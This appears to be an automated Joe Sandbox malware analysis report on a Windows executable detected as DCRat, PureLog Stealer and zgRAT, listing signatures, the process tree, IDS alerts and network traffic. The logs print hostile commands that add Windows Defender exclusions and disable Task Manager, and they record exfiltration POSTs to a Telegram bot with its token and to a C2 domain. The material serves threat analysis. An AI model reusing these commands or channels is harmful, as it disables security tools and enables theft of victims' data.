Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PbfYaIvR5B.exe

Overview

General Information

Sample name:PbfYaIvR5B.exe
renamed because original name is a hash value
Original sample name:7471eb468a1f0166167f369bec578915.exe
Analysis ID:1543377
MD5:7471eb468a1f0166167f369bec578915
SHA1:9ded35e930d112a8909dad6aaf1a657f65284588
SHA256:9e52adafb9ddb7668e8c025ebd74a856434b0c4c487a6204fe750e683bc3dbe4
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • PbfYaIvR5B.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\PbfYaIvR5B.exe" MD5: 7471EB468A1F0166167F369BEC578915)
    • wscript.exe (PID: 7312 cmdline: "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7628 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • MsPortSavesruntime.exe (PID: 7644 cmdline: "C:\webHostnet/MsPortSavesruntime.exe" MD5: 4F593957FF5A8313DC52738F85592CBA)
          • powershell.exe (PID: 6948 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6328 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 8176 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 7284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7268 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 6164 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7332 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7916 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7948 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • AvdGjRxbXYfvkpkpztF.exe (PID: 7144 cmdline: "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe" MD5: 4F593957FF5A8313DC52738F85592CBA)
    • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AvdGjRxbXYfvkpkpztF.exe (PID: 3512 cmdline: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe MD5: 4F593957FF5A8313DC52738F85592CBA)
  • AvdGjRxbXYfvkpkpztF.exe (PID: 3584 cmdline: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe MD5: 4F593957FF5A8313DC52738F85592CBA)
  • Idle.exe (PID: 4312 cmdline: "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe" MD5: 4F593957FF5A8313DC52738F85592CBA)
  • Idle.exe (PID: 2084 cmdline: "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe" MD5: 4F593957FF5A8313DC52738F85592CBA)
  • MsPortSavesruntime.exe (PID: 3128 cmdline: C:\webHostnet\MsPortSavesruntime.exe MD5: 4F593957FF5A8313DC52738F85592CBA)
  • MsPortSavesruntime.exe (PID: 4020 cmdline: C:\webHostnet\MsPortSavesruntime.exe MD5: 4F593957FF5A8313DC52738F85592CBA)
  • svchost.exe (PID: 7792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
PbfYaIvR5B.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    PbfYaIvR5B.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries
                SourceRuleDescriptionAuthorStrings
                00000006.00000000.1888745544.0000000000CC2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000006.00000002.2026149652.0000000013385000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000003.1690511695.000000000744A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.1689915107.0000000006B32000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Process Memory Space: MsPortSavesruntime.exe PID: 7644JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          SourceRuleDescriptionAuthorStrings
                          0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.PbfYaIvR5B.exe.6b3ecda.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.PbfYaIvR5B.exe.7456cda.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.PbfYaIvR5B.exe.7456cda.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                    Click to see the 4 entries

                                    System Summary

                                    barindex
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe" , CommandLine: "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7332, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe" , ProcessId: 7144, ProcessName: AvdGjRxbXYfvkpkpztF.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\webHostnet/MsPortSavesruntime.exe", ParentImage: C:\webHostnet\MsPortSavesruntime.exe, ParentProcessId: 7644, ParentProcessName: MsPortSavesruntime.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', ProcessId: 6948, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\webHostnet/MsPortSavesruntime.exe", ParentImage: C:\webHostnet\MsPortSavesruntime.exe, ParentProcessId: 7644, ParentProcessName: MsPortSavesruntime.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', ProcessId: 6948, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PbfYaIvR5B.exe", ParentImage: C:\Users\user\Desktop\PbfYaIvR5B.exe, ParentProcessId: 7268, ParentProcessName: PbfYaIvR5B.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" , ProcessId: 7312, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\webHostnet/MsPortSavesruntime.exe", ParentImage: C:\webHostnet\MsPortSavesruntime.exe, ParentProcessId: 7644, ParentProcessName: MsPortSavesruntime.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe', ProcessId: 6948, ProcessName: powershell.exe
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7792, ProcessName: svchost.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-10-27T19:22:43.305353+010020480951A Network Trojan was detected192.168.2.449739188.114.97.380TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-10-27T19:22:28.144078+010028033053Unknown Traffic192.168.2.44973734.117.59.81443TCP
                                    2024-10-27T19:22:51.390049+010028033053Unknown Traffic192.168.2.44975234.117.59.81443TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: PbfYaIvR5B.exeAvira: detected
                                    Source: C:\Users\user\Desktop\MSRJxIpk.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\MXTAwxLv.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\y7jCVExOhX.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\XGvzhUkS.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\XLyrgJGd.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeReversingLabs: Detection: 66%
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeReversingLabs: Detection: 66%
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeReversingLabs: Detection: 66%
                                    Source: C:\Users\user\Desktop\MaBbbrQq.logReversingLabs: Detection: 23%
                                    Source: C:\Users\user\Desktop\XGvzhUkS.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\XLyrgJGd.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\XurZRnMb.logReversingLabs: Detection: 23%
                                    Source: C:\webHostnet\AvdGjRxbXYfvkpkpztF.exeReversingLabs: Detection: 66%
                                    Source: C:\webHostnet\MsPortSavesruntime.exeReversingLabs: Detection: 66%
                                    Source: PbfYaIvR5B.exeReversingLabs: Detection: 68%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\mhsoucuo.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\lhjGsiaz.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\XGvzhUkS.logJoe Sandbox ML: detected
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\XLyrgJGd.logJoe Sandbox ML: detected
                                    Source: PbfYaIvR5B.exeJoe Sandbox ML: detected
                                    Source: PbfYaIvR5B.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\6ccacd8608530fJump to behavior
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49736 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49749 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
                                    Source: PbfYaIvR5B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PbfYaIvR5B.exe, 00000000.00000003.1690511695.00000000073F8000.00000004.00000020.00020000.00000000.sdmp, PbfYaIvR5B.exe, 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp, PbfYaIvR5B.exe, 00000000.00000000.1688277278.0000000000073000.00000002.00000001.01000000.00000003.sdmp, PbfYaIvR5B.exe, 00000000.00000003.1689915107.0000000006AE0000.00000004.00000020.00020000.00000000.sdmp
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004A69B
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005C220
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 188.114.97.3:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: unknownDNS query: name: api.telegram.org
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: POST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="68d30593-7ba0-4754-ba4f-858b55a2ddb4"Host: api.telegram.orgContent-Length: 74846Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: POST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="e62f1995-643c-4ec6-8579-e0af2437cb00"Host: api.telegram.orgContent-Length: 74797Expect: 100-continueConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                                    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                                    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknownDNS query: name: ipinfo.io
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 34.117.59.81:443
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 34.117.59.81:443
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1712Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 130940Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
